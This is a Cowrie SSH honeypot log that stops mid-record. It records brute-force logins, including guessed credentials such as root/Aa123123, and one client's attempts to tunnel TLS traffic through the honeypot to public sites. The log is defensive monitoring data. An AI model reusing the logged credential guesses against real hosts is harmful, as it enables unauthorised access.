{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:54.774809Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.closed","duration":"21.9","message":"Connection lost after 21.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:54.775906Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34952,"dst_ip":"1.2.3.4","dst_port":22,"session":"1de7ddfb66ff","protocol":"ssh","message":"New connection: 212.227.235.229:34952 (1.2.3.4:22) [session: 1de7ddfb66ff]","sensor":"my-vps","timestamp":"2025-08-26T13:13:08.543941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:13:08.544628Z","src_ip":"212.227.235.229","session":"1de7ddfb66ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:13:16.955781Z","src_ip":"212.227.235.229","session":"1de7ddfb66ff"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:13:16.958339Z","src_ip":"212.227.235.229","session":"1de7ddfb66ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52456,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0acef821b93","protocol":"ssh","message":"New connection: 212.227.235.229:52456 (1.2.3.4:22) [session: d0acef821b93]","sensor":"my-vps","timestamp":"2025-08-26T13:13:27.988451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:13:27.989506Z","src_ip":"212.227.235.229","session":"d0acef821b93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:13:28.235827Z","src_ip":"212.227.235.229","session":"d0acef821b93"}
{"eventid":"cowrie.login.failed","username":"admin","password":"yesyes","message":"login attempt [admin/yesyes] failed","sensor":"my-vps","timestamp":"2025-08-26T13:13:29.263794Z","src_ip":"212.227.235.229","session":"d0acef821b93"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:13:30.512330Z","src_ip":"212.227.235.229","session":"d0acef821b93"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.21","src_port":34870,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a6ff4336904","protocol":"ssh","message":"New connection: 194.0.234.21:34870 (1.2.3.4:22) [session: 4a6ff4336904]","sensor":"my-vps","timestamp":"2025-08-26T13:13:37.241559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T13:13:37.243226Z","src_ip":"194.0.234.21","session":"4a6ff4336904"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T13:13:37.260699Z","src_ip":"194.0.234.21","session":"4a6ff4336904"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123123","message":"login attempt [root/Aa123123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:13:37.356511Z","src_ip":"194.0.234.21","session":"4a6ff4336904"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.228.208.160","dst_port":443,"src_ip":"194.0.234.21","src_port":42938,"message":"direct-tcp connection request to 54.228.208.160:443 from 127.0.0.1:42938","sensor":"my-vps","timestamp":"2025-08-26T13:13:38.923710Z","session":"4a6ff4336904"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.228.208.160","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03.\\xd8\\x00\\x19x_\\x95$O\\x05)\\x8d\\x91\\x0cB\\x07\\xbd]Y\\xf5\\x1b0\\xab\\x03ix\\xc3\\xf6d\\xaf\\x87$ \\x84\\xf9\\x9e\\xb0\\xc47w\\xfd*\\x0b\\xf9\\x86\\x8e\\x07^\\x1eJ\\x9cp+W\\x9b\\xcf\\xc1\\xc2#\\xf2>\\xa1\\x11\\xaa)\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xa1\\xf5\\xa6\\xf2\\xa5\\xf8Wa\\x0f\\xbc?O\\xe5G\\x8c\\x9e\\xac\\xcd\\xb6\\xd4$o\\x80\\x02\\x15\\xa6}\\x99#/\\xf6\\x10\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.228.208.160:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03.\\xd8\\x00\\x19x_\\x95$O\\x05)\\x8d\\x91\\x0cB\\x07\\xbd]Y\\xf5\\x1b0\\xab\\x03ix\\xc3\\xf6d\\xaf\\x87$ \\x84\\xf9\\x9e\\xb0\\xc47w\\xfd*\\x0b\\xf9\\x86\\x8e\\x07^\\x1eJ\\x9cp+W\\x9b\\xcf\\xc1\\xc2#\\xf2>\\xa1\\x11\\xaa)\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xa1\\xf5\\xa6\\xf2\\xa5\\xf8Wa\\x0f\\xbc?O\\xe5G\\x8c\\x9e\\xac\\xcd\\xb6\\xd4$o\\x80\\x02\\x15\\xa6}\\x99#/\\xf6\\x10\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T13:13:38.950630Z","src_ip":"194.0.234.21","session":"4a6ff4336904"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.2.65.48","dst_port":443,"src_ip":"194.0.234.21","src_port":43070,"message":"direct-tcp connection request to 23.2.65.48:443 from 127.0.0.1:43070","sensor":"my-vps","timestamp":"2025-08-26T13:13:38.972448Z","session":"4a6ff4336904"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.2.65.48","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xc1?$\\xcb\\x99\\xc8\\x90\\xde4\\xbb\\xe8\\x96h\\xda\\x03\\xf8\\x17t\\xe6\\xb8?!\\xd0\\xab\\x85wD\\x19\\xd3H\\xc8\\x00 \\x92]\\xae\\xb3\\x89\\x83bS~\\x12o\\xec\\xd0\\xc1\\xcd\\xa2\\xa0\\xf2\\x0e\\r\\xbe1\\x0c)\\x19*,\\x98\\xf6\\xba\\t\\xfa\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 K\"c4\\x961\\x7fR\\xd8\\x85\\x89\\x92xi!\\x103\\x8e\\x95\\xf1\\xee\\xb7\\xcd\\xa0\\xab\\xf2\\xdb)\\xa6\\x10x\\x10\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":1,"message":"discarded direct-tcp forward request 1 to 23.2.65.48:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xc1?$\\xcb\\x99\\xc8\\x90\\xde4\\xbb\\xe8\\x96h\\xda\\x03\\xf8\\x17t\\xe6\\xb8?!\\xd0\\xab\\x85wD\\x19\\xd3H\\xc8\\x00 \\x92]\\xae\\xb3\\x89\\x83bS~\\x12o\\xec\\xd0\\xc1\\xcd\\xa2\\xa0\\xf2\\x0e\\r\\xbe1\\x0c)\\x19*,\\x98\\xf6\\xba\\t\\xfa\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 K\"c4\\x961\\x7fR\\xd8\\x85\\x89\\x92xi!\\x103\\x8e\\x95\\xf1\\xee\\xb7\\xcd\\xa0\\xab\\xf2\\xdb)\\xa6\\x10x\\x10\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-26T13:13:38.995186Z","src_ip":"194.0.234.21","session":"4a6ff4336904"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.186.196","dst_port":443,"src_ip":"194.0.234.21","src_port":43810,"message":"direct-tcp connection request to 142.250.186.196:443 from 127.0.0.1:43810","sensor":"my-vps","timestamp":"2025-08-26T13:13:39.971894Z","session":"4a6ff4336904"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.186.196","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x87:]\\x98\\x80\\xb0_| \\x8d\\xbd\\x19b\\x06>\\xfe\\xb5\\xd0\\xbd\\xd1\\xa0\\xaf\\x96W\\xf6>d\\xa7?[\\x8a\\xb8 \\x8e\\x01\\xe7\\x8f\\x15\\x1d7\\x80!\\n\\xf2\\xacm\\x1f]Vt\\xaa8?\\xda\\xae)\\x07\\xef4\\x13mo\\x8b<\\xc6\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 O&o\\x876\\xadQ/\\xf1\\xf8\\xed\\xceF\\x07o\\xaf\\x9d\\xe8U\\xab\\xe9p8\\xaa\\xd1q\\xf9\\x1656\\xfe\\x18\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0